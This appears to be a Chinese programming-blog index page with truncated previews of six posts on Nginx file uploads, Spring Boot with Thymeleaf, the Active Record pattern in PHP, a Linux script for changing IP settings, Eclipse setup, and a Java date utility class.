  • 使用 Nginx Upload Module 实现上传文件功能 hongtoushizi nginx
    转载自: http://www.tuicool.com/wx/aUrAzm   普通网站在实现文件上传功能的时候,一般是使用Python,Java等后端程序实现,比较麻烦。Nginx有一个Upload模块,可以非常简单的实现文件上传功能。此模块的原理是先把用户上传的文件保存到临时文件,然后在交由后台页面处理,并且把文件的原名,上传后的名称,文件类型,文件大小set到页面。下
  • spring-boot-web-ui及thymeleaf基本使用 jishiweili springthymeleaf
    视图控制层代码demo如下:   @Controller @RequestMapping("/") public class MessageController { private final MessageRepository messageRepository; @Autowired public MessageController(Mes
  • 数据源架构模式之活动记录 home198979 PHP架构活动记录数据映射
    hello!架构 一、概念 活动记录(Active Record):一个对象,它包装数据库表或视图中某一行,封装数据库访问,并在这些数据上增加了领域逻辑。 对象既有数据又有行为。活动记录使用直截了当的方法,把数据访问逻辑置于领域对象中。   二、实现简单活动记录 活动记录在php许多框架中都有应用,如cakephp。 <?php /** * 行数据入口类 *
  • Linux Shell脚本之自动修改IP pda158 linuxcentosDebian脚本
    作为一名 Linux SA,日常运维中很多地方都会用到脚本,而服务器的ip一般采用静态ip或者MAC绑定,当然后者比较操作起来相对繁琐,而前者我们可以设置主机名、ip信息、网关等配置。修改成特定的主机名在维护和管理方面也比较方便。如下脚本用途为:修改ip和主机名等相关信息,可以根据实际需求修改,举一反三! #!/bin/sh #auto Change ip netmask ga
  • 开发环境搭建 独浮云 eclipsejdktomcat
           最近在开发过程中,经常出现MyEclipse内存溢出等错误,需要重启的情况,好麻烦。对于一般的JAVA+TOMCAT项目开发,其实没有必要使用重量级的MyEclipse,使用eclipse就足够了。尤其是开发机器硬件配置一般的人。         &n
  • 操作日期和时间的工具类 vipbooks 工具类
       大家好啊,好久没有来这里发文章了,今天来逛逛,分享一篇刚写不久的操作日期和时间的工具类,希望对大家有所帮助。 /* * @(#)DataFormatUtils.java 2010-10-10 * * Copyright 2010 BianJing,All rights reserved. */ package test; impor
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他